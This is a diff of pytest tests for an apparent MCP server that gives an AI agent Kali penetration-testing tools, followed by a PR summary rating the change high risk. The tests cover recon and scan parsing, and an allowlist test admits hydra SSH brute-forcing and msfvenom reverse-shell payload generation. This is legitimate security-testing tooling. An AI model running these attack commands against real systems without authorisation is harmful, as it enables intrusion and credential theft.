+    """Test DNS enumeration output format."""
+    from kali_mcp_server.tools import dns_enum
+
+    result = await dns_enum("example.com", record_types="a")
+    assert len(result) == 1
+    assert "dns_enum" in result[0].text
+    assert "example.com" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_enum_shares():
+    """Test share enumeration output format."""
+    from kali_mcp_server.tools import enum_shares
+
+    result = await enum_shares("192.168.1.1", enum_type="smb")
+    assert len(result) == 1
+    assert "enum_shares" in result[0].text
+    assert "192.168.1.1" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_parse_nmap_text():
+    """Test nmap text output parsing."""
+    import tempfile
+    import os
+    from kali_mcp_server.tools import parse_nmap
+
+    nmap_output = """Starting Nmap 7.94 ( https://nmap.org )
+Nmap scan report for 192.168.1.1
+Host is up (0.001s latency).
+
+PORT     STATE SERVICE  VERSION
+22/tcp   open  ssh      OpenSSH 8.9
+80/tcp   open  http     Apache httpd 2.4.52
+443/tcp  open  https    nginx 1.22
+
+Nmap done: 1 IP address (1 host up) scanned in 5.00 seconds
+"""
+    with tempfile.NamedTemporaryFile(mode="w", suffix=".txt", delete=False) as f:
+        f.write(nmap_output)
+        tmpfile = f.name
+
+    try:
+        result = await parse_nmap(tmpfile)
+        assert len(result) == 1
+        assert "22/tcp" in result[0].text
+        assert "80/tcp" in result[0].text
+        assert "443/tcp" in result[0].text
+        assert "192.168.1.1" in result[0].text
+    finally:
+        os.unlink(tmpfile)
+        # Clean up parsed JSON if created
+        json_file = tmpfile.rsplit(".", 1)[0] + "_parsed.json"
+        if os.path.exists(json_file):
+            os.unlink(json_file)
+
+
+@pytest.mark.asyncio
+async def test_parse_nmap_xml():
+    """Test nmap XML output parsing."""
+    import tempfile
+    import os
+    from kali_mcp_server.tools import parse_nmap
+
+    nmap_xml = """<?xml version="1.0"?>
+<nmaprun>
+  <host>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="22">
+        <state state="open"/>
+        <service name="ssh" product="OpenSSH" version="8.9"/>
+      </port>
+      <port protocol="tcp" portid="80">
+        <state state="open"/>
+        <service name="http" product="Apache" version="2.4"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>
+"""
+    with tempfile.NamedTemporaryFile(mode="w", suffix=".xml", delete=False) as f:
+        f.write(nmap_xml)
+        tmpfile = f.name
+
+    try:
+        result = await parse_nmap(tmpfile)
+        assert len(result) == 1
+        assert "22/tcp" in result[0].text
+        assert "80/tcp" in result[0].text
+        assert "10.0.0.1" in result[0].text
+    finally:
+        os.unlink(tmpfile)
+        json_file = tmpfile.rsplit(".", 1)[0] + "_parsed.json"
+        if os.path.exists(json_file):
+            os.unlink(json_file)
+
+
+@pytest.mark.asyncio
+async def test_parse_nmap_file_not_found():
+    """Test parse_nmap with missing file."""
+    from kali_mcp_server.tools import parse_nmap
+
+    result = await parse_nmap("/nonexistent/file.txt")
+    assert len(result) == 1
+    assert "File not found" in result[0].text
+
+
+@pytest.mark.asyncio
+async def test_parse_tool_output_nikto():
+    """Test nikto output parsing."""
+    import tempfile
+    import os
+    from kali_mcp_server.tools import parse_tool_output
+
+    nikto_output = """- nikto v2.5.0
++ Target IP:          192.168.1.1
++ Target Hostname:    example.com
++ Target Port:        80
++ Start Time:         2024-01-01 00:00:00
++ Server: Apache/2.4.52
++ /admin/: Directory indexing found
++ /backup/: Backup directory found
++ OSVDB-3233: /icons/README: Apache default file found
+"""
+    with tempfile.NamedTemporaryFile(mode="w", suffix=".txt", delete=False) as f:
+        f.write(nikto_output)
+        tmpfile = f.name
+
+    try:
+        result = await parse_tool_output(tmpfile)
+        assert len(result) == 1
+        assert "nikto" in result[0].text
+        assert "findings" in result[0].text.lower()
+    finally:
+        os.unlink(tmpfile)
+        json_file = tmpfile.rsplit(".", 1)[0] + "_parsed.json"
+        if os.path.exists(json_file):
+            os.unlink(json_file)
+
+
+@pytest.mark.asyncio
+async def test_parse_tool_output_auto_detect_failure():
+    """Test auto-detection failure with unknown content."""
+    import tempfile
+    import os
+    from kali_mcp_server.tools import parse_tool_output
+
+    with tempfile.NamedTemporaryFile(mode="w", suffix=".txt", delete=False) as f:
+        f.write("This is just random text that doesn't match any tool")
+        tmpfile = f.name
+
+    try:
+        result = await parse_tool_output(tmpfile)
+        assert len(result) == 1
+        assert "Could not auto-detect" in result[0].text
+    finally:
+        os.unlink(tmpfile)
+
+
+@pytest.mark.asyncio
+async def test_recon_auto():
+    """Test automated recon pipeline output."""
+    from kali_mcp_server.tools import recon_auto
+
+    result = await recon_auto("example.com", depth="quick")
+    assert len(result) == 1
+    assert "Automated Recon" in result[0].text
+    assert "DNS Enumeration" in result[0].text
+    assert "Quick Port Scan" in result[0].text
+    assert "Header Analysis" in result[0].text
+
+
+def test_new_allowed_commands():
+    """Test that new commands are in the ALLOWED_COMMANDS list."""
+    assert is_command_allowed("hydra -l admin -p pass 10.0.0.1 ssh")[0] is True
+    assert is_command_allowed("hydra -l admin -p pass 10.0.0.1 ssh")[1] is True  # Long-running
+    assert is_command_allowed("msfvenom -p linux/x86/shell_reverse_tcp")[0] is True
+    assert is_command_allowed("msfvenom -p linux/x86/shell_reverse_tcp")[1] is True  # Long-running
+    assert is_command_allowed("smbclient -L 10.0.0.1 -N")[0] is True
+    assert is_command_allowed("smbclient -L 10.0.0.1 -N")[1] is False  # Not long-running
+    assert is_command_allowed("enum4linux -a 10.0.0.1")[0] is True
+    assert is_command_allowed("enum4linux -a 10.0.0.1")[1] is True  # Long-running
+    assert is_command_allowed("showmount -e 10.0.0.1")[0] is True
+    assert is_command_allowed("hashid abc123")[0] is True


### PR DESCRIPTION
Increased tooling to 35, all enabled by default

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **High Risk**
> Significantly expands command execution surface area and introduces new wrappers for offensive tooling (hydra/msfvenom, broad `cat` access), increasing the chance of misuse or unintended side effects despite container isolation.
> 
> **Overview**
> Adds 12 new MCP tools and schemas (e.g., `port_scan`, `dns_enum`, `recon_auto`, `hydra_attack`, `payload_generate`, `parse_nmap`, `parse_tool_output`, plus encoding/hash/credential helpers) and wires them into `handle_tool_request()` dispatch.
> 
> Broadens the command allowlist to support many more Kali utilities (including Metasploit/hydra/share-enum tooling) and tracks new output artifacts (scan/payload/parsed JSON/recon reports/credentials) for easier evidence handling.
> 
> Updates the Docker image to install additional share/hash tooling (`smbclient`, `enum4linux`, `nfs-common`, `hashid`) and refreshes `README.md`/`CLAUDE.md` plus expands test coverage for the new tool dispatch and implementations.
> 
> <sup>Written by [Cursor Bugbot](https://cursor.com/dashboard?tab=bugbot) for commit 1639e84666bb4ec7489d5cbae75c4a187a6e8126. Configure [here](https://cursor.com/dashboard?tab=bugbot).</sup>
<!-- /CURSOR_SUMMARY -->